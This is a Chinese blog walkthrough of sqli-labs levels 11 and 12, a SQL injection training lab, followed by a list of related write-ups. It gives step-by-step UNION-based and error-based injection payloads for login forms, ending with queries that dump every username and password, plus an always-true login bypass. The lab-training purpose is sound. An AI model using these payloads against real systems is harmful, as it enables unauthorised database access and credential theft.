sqli-labs通关(十一)(十二)

最新推荐文章于 2024-04-28 21:28:59 发布
最新推荐文章于 2024-04-28 21:28:59 发布
阅读量186 收藏 1
点赞数
分类专栏: sqli-labs通关 文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65950075/article/details/130473198
版权
文章讲述了从第十一关开始,攻击者面对POST请求的SQL注入问题。通过输入特定字符引发错误,从而判断字段数、数据库名、版本、表名、列名,并最终获取用户信息。在第十二关,利用双引号触发报错,构建永真式进行进一步的注入攻击,揭示了安全防护中的潜在风险。
摘要由CSDN通过智能技术生成

第十一关

变成了一个登录页面,那么注入点就在输入框里面。前十关使用的是get请求,参数都体现在url上面,而从十一关开始是post请求,参数是在表单里面。我们可以直接在输入框进行注入就行。并且参数不在是一个还是两个。根据前面的认识我们可以猜测sql语句。大概的形式应该是这样username=参数 and password=参数 ,只是不知道是字符型还是整数型。

我们在输入框输入1',直接出现报错信息

根据报错信息,我们输入

1'order by 2 #

判断字段数为2,因为3报错

跟第一关一样,我们直接用爆出数据库名和版本号 

1'union select database(),version()#

 然后就是表名

1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

 列名

1'union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

爆出全部的用户名和密码 

1' union select group_concat(username),group_concat(password) from users #

 

 

第十二关

我们输入1和1'都没有反应,当输入1"时,出现报错信息 

报错信息告诉我们sql语句由双引号和括号闭合

我们构造永真式看看存不存在sql注入

1") or 1=1 #

1") union select 1,2 #

 

爆表

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 爆列名

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() #

爆出全部用户名和密码

1") union select group_concat(username),group_concat(password) from users# 

 

幕溪WM
关注
专栏目录
sqli-labs 第十一
weixin_67813445的博客
02-16 319
第11关出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs 通关记录 01
学习
08-15 373
如图,我们先使用单引号注入进行测试, 结果显示,有报错,接下来用 and 1=1和and 1=2分别测试 ,结果显示,它能执行我们的两条注入语句,1=1不报错,1=2报错 既然可以执行我们的语句,接下来就是通过注入提数据 利用union 查询,通过写入 select 1,2,3进行回显 。 既然有数据回显,那就继续查询,查当前用户,查数据库版本号 http://192.168.18.136/sqli-labs-master/Less-1/?id=-1' union...
sqli-labs第十一
小人物的博客
06-10 4408
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sqli-labs-----第11关
wyzhxhn的博客
11-09 1855
基于错误的POST型单引号字符型注入
Sqlilabs-12
KAKA的博客
07-07 309
这里到了 12 关,是 11 关的练习版本,只不过是把单引号换成了 双引号 + 括号,其余的都是一样的。 这里仍然以 hackbar 为例构造 payload: uname=admin") order by 3#&passwd=1&submit=submit uname=admin") order by 2#&passwd=1&submit=submit uname=-admin") union select 1,2#&passwd=1&submit=sub.
sqli-labs通关笔记
m0_55563900的博客
04-04 4555
32关 宽字节注入 正常思路 输入’ " 等等一些特殊符号 输入单引号之后出现了转义,把单引号转义成’,所以要用GBK编码 %df+’ 字段数为3列,然后使用联合查询就可以了
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1404
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1836
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 710
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1071
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs第十一关、第十二
qq_51366383的博客
12-07 436
从第十一关开始需要使用bp,我这里的都是用的repeater操作的。 判断闭合符 uname=admin’ --+&passwd=admin&submit=Submit 通过下面的对比可以看到这个是有回显出来的 uname=admin" --+&passwd=admin&submit=Submit 判断列数 uname=admin’ order by 2 --+&passwd=admin&submit=Submit 判断回显位 uname=admin’
SQLI-labs-第十一关和第十二
最新发布
weixin_54055099的博客
04-28 1109
Sqli-labs的第11关和12关,有关POST方式的联合查询注入
sqli-labs第十二
yuqnqi的博客
05-08 798
对了,也可以用报错注入,下次再写。由此判断为,双引号反括号闭合;post传值,跟十一关差不多。就是正常的sql注入流程。第一步,判断闭合方式。
sqli-labs第12关
weixin_45626840的博客
04-23 339
思路一样 闭合类型为 “)
sql报错型注入-sqli-labs第11关
weixin_46784800的博客
11-03 566
获取数据的操作 判断是否为字符型注入 passwd=1' or '1'='1 &uname=1' or '1'='1 输入post参数判断是否为字符型注入 判断数据库中含有多少列 通过查询语句: uname=1'or 1=1 order by 3 -- -&passwd=1' or 1=1 -- - 可发现报错:Unknown column ‘3’ in ‘order clause’,则可说明查询的数据库中只有两列,则可确定后续的联合查询的参数数量。 判断界面输出与数据库的接口
sqli-lab(12)
qq_53030229的博客
05-03 522
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代.
sqli-labs(12)
weixin_30699465的博客
05-24 89
0X01摘要体现(小编这里傻逼了 可以直接用group_concat函数绕过显示问题我还在用limit绕过) 还是这个模块 我们很熟徐那么先来尝试一下 单引号加入 无报错信息 哦豁 加入双引号试试呐 哦豁 好像报错 了 还多了一个括号 那我们尝试一下闭合语句 ") order by 1 # 好像成功闭合了 哈哈 看来没有猜错 元语句应该是 id=("") 那都...
sqli-labs通关28
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值